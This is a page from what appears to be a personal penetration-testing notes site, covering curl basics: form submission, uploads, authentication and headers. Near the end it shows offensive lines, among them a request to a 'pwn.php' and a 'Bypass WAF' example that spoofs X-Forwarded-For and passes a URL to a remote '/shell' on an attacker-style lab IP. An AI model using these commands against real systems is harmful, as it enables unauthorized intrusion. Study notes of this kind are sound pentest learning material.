Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page
  • Examples
  • Get-form
  • Post-form
  • File Upload Post
  • Hidden fields
  • Put
  • Location header
  • User-Agent

Was this helpful?

  1. Tools / Techniques

Curl

Transfer a URL

CURL is a tool to transfer data from or to a server, using one of the supported protocols

DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, 
POP3S, RTMP, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET and TFTP

The command is designed to work without user interaction.

curl:
    -v: verbose
    -F: file upload
    -X: make a request  

Examples

##### GET example #####
curl http://www.example.com 



##### GET example with hidden info #####
curl -i http://www.example.com 



##### HEAD example #####
 curl --head http://www.example.com
or
 curl -I http://www.example.com



##### Multiple URL's #####
curl http://url1.example.com http://url2.example.com



##### Trace all connections: more than verbose #####
curl --trace-ascii output_filename.txt http://www.example.com 



##### Saves output to a file #####
curl http://www.example.com -O output_filename.txt



##### Passing username:password #####
 curl http://user:password@example.org/
or
 curl -u user:password http://example.org/

Get-form

<form method="GET" action="junk.cgi">
 <input type=text name="birthyear">
 <input type=submit name=press value="OK">
 </form>
 
 curl "http://www.hotmail.com/when/junk.cgi?birthyear=1905&press=OK"

Post-form

 <form method="POST" action="junk.cgi">
 <input type=text name="birthyear">
 <input type=submit name=press value=" OK ">
 </form>
 
  curl --data "birthyear=1905&press=%20OK%20"  http://www.example.com/when.cgi

File Upload Post

<form method="POST" enctype='multipart/form-data' action="upload.cgi">
 <input type=file name=upload>
 <input type=submit name=press value="OK">
</form>

curl --form upload=@localfilename --form press=OK [URL]

Hidden fields

<form method="POST" action="foobar.cgi">
 <input type=text name="birthyear">
 <input type=hidden name="person" value="daniel">
 <input type=submit name="press" value="OK">
</form>

 curl --data "birthyear=1905&press=OK&person=daniel" [URL]

Put

curl --upload-file uploadfile http://www.example.com/receive.cgi

Location header

 ##### Follows redirection #####
 curl --location http://www.example.com

User-Agent

curl -A "user-agent-name" -L 10.10.10.10

-A: sets the user-agent
-L: follows the redirection

Authenticate through CLI

curl -u 'username':'password' http://10.10.10.10:8080/path/to/page
curl http://username:password@10.10.10.10:8080/login

curl -X POST http://10.10.10.10:8080/login -d 'user=username&password=password'
curl -X POST http://10.10.10.10:8080/login -d 'username=username&password=password'

JSON Web Token:
curl http://10.10.10.10:8080/login -H 'Authorisation: Bearer token_here'
curl -s http://10.10.10.10:8080/users/1 -H 'Authorisation: Bearer token_here'
curl -s http://10.10.10.10:8080/users/Admin -H 'Authorisation: Bearer token_here'

Curl Call

curl --user username:password 10.10.10.10/pwn.php

Bypass WAF and pass data

curl -X POST http://10.10.10.10/some_content -H "Content-Type: application/json" -H "X-Forwarded-For: localhost" --data ‘{"user":"myusername","url":"http://10.10.10.20/shell"}’ 
PreviousScreenshots in KaliNextResources

Last updated 3 years ago

Was this helpful?